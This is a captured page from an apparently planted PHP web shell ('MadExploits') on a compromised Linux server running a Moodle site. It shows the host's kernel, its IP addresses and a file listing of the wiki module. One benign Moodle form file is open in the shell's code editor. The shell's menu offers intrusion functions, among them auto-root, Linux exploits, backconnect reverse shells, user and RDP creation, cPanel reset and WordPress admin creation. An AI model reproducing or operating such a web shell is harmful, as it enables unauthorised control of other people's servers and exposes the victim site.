Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.7.46
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead.aptans /
mod /
wiki /
[ HOME SHELL ]
Name
Size
Permission
Action
backup
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
diff
[ DIR ]
drwxr-xr-x
editors
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
parser
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
README
138
B
-rw-r--r--
admin.php
4.24
KB
-rw-rw-r--
comments.php
2.49
KB
-rw-rw-r--
comments_form.php
1.44
KB
-rw-rw-r--
create.php
4.01
KB
-rw-r--r--
create_form.php
3.68
KB
-rw-r--r--
diff.php
2.86
KB
-rw-rw-r--
edit.php
4.1
KB
-rw-rw-r--
edit_form.php
5.22
KB
-rw-r--r--
editcomments.php
2.36
KB
-rw-rw-r--
files.php
4.13
KB
-rw-rw-r--
filesedit.php
3.77
KB
-rw-rw-r--
filesedit_form.php
1.66
KB
-rw-r--r--
history.php
2.69
KB
-rw-rw-r--
index.php
3.04
KB
-rw-r--r--
instancecomments.php
3.34
KB
-rw-rw-r--
lib.php
28.77
KB
-rw-rw-r--
locallib.php
60.84
KB
-rw-r--r--
lock.php
2.43
KB
-rw-r--r--
map.php
2.66
KB
-rw-rw-r--
mod_form.php
4.29
KB
-rw-r--r--
module.js
4.25
KB
-rw-r--r--
overridelocks.php
2.47
KB
-rw-r--r--
pagelib.php
95.7
KB
-rw-rw-r--
prettyview.php
2.29
KB
-rw-r--r--
renderer.php
25.49
KB
-rw-rw-r--
restoreversion.php
2.49
KB
-rw-rw-r--
search.php
2.87
KB
-rw-r--r--
styles.css
5.55
KB
-rw-rw-r--
upgrade.txt
902
B
-rw-rw-r--
version.php
1.44
KB
-rw-rw-r--
view.php
9.89
KB
-rw-rw-r--
viewversion.php
2.65
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments_form.php
<?php if (!defined('MOODLE_INTERNAL')) { die('Direct access to this script is forbidden.'); /// It must be included from a Moodle page } require_once($CFG->dirroot . '/lib/formslib.php'); class mod_wiki_comments_form extends moodleform { protected function definition() { $mform = $this->_form; $current = $this->_customdata['current'] ?? null; $commentoptions = $this->_customdata['commentoptions'] ?? null; // visible elements $mform->addElement('editor', 'entrycomment_editor', get_string('comment', 'glossary'), null, $commentoptions); $mform->addRule('entrycomment_editor', get_string('required'), 'required', null, 'client'); $mform->setType('entrycomment_editor', PARAM_RAW); // processed by trust text or cleaned before the display // hidden optional params $mform->addElement('hidden', 'id', ''); $mform->setType('id', PARAM_INT); $mform->addElement('hidden', 'action', ''); $mform->setType('action', PARAM_ALPHAEXT); //------------------------------------------------------------------------------- // buttons $this->add_action_buttons(false); //------------------------------------------------------------------------------- $this->set_data($current); } public function edit_definition($current, $commentoptions) { $this->set_data($current); $this->set_data($commentoptions); } }
Close